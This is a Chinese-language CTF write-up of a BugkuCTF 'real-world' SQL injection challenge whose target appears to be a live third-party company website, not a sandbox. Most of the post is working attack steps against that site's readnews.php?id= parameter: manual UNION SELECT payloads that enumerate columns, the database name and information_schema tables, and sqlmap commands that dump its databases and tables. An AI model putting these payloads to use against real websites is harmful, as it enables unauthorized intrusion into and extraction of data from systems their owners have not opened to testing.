BugkuCTF-web进阶-实战2-注入 writeup

题目描述

  • 解题传送门:http://www.kabelindo.co.id/
    BugkuCTF-web进阶-实战2-注入 writeup_第1张图片

解题思路

BugkuCTF-web进阶-实战2-注入 writeup_第2张图片
打开链接后得到个这个页面,注入,,,我一开始在搜索框内随意试试,发现没什么用,抓包也没啥结果。然后就逛逛这个网站看看哪里有注入点,找了一会,在页面的About-News里面发现数字型注入,话不多说,开始
BugkuCTF-web进阶-实战2-注入 writeup_第3张图片
注入嘛,老套路,两种方法

  • 法一、手工注入
    猜字段http://www.kabelindo.co.id/readnews.php?id=28 order by 5正常
    BugkuCTF-web进阶-实战2-注入 writeup_第4张图片
    http://www.kabelindo.co.id/readnews.php?id=28 order by 6
    报错,字段为5
    BugkuCTF-web进阶-实战2-注入 writeup_第5张图片
    看字段回显(记得把id置为无用数值,不然会掩盖后面的查询结果)
    http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,2,3,4,5
    BugkuCTF-web进阶-实战2-注入 writeup_第6张图片
    暴数据库http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,database(),3,4,5
    得到数据库u9897uwx_kabel
    BugkuCTF-web进阶-实战2-注入 writeup_第7张图片
    暴表名http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()
    BugkuCTF-web进阶-实战2-注入 writeup_第8张图片
    这个表太多了,没法全部显示,我们只需要查看源码即可,表在‘3’的前面
    BugkuCTF-web进阶-实战2-注入 writeup_第9张图片
  • 法二、sqlmap
    可以抓包,salmap扫描包,也可以直接扫描网站,都可以,这里我就扫描网站吧,懒得抓包,存txt了
    暴数据库sqlmap.py -u www.kabelindo.co.id/readnews.php?id=28 --dbs
    –dbs(两个-) -->查询当前数据库
    得到数据库u9897uwx_kabel
    BugkuCTF-web进阶-实战2-注入 writeup_第10张图片
    暴表名sqlmap.py -u www.kabelindo.co.id/readnews.php?id=28 -D u9897uwx_kabel --tables
    -D -->指定数据库
    –tables(两个-) -->查询当前数据库的表名
    得到最后一个表名tbnomax
    BugkuCTF-web进阶-实战2-注入 writeup_第11张图片

得到FLAG

flag{tbnomax}


END

你可能感兴趣的:(CTF做题记录)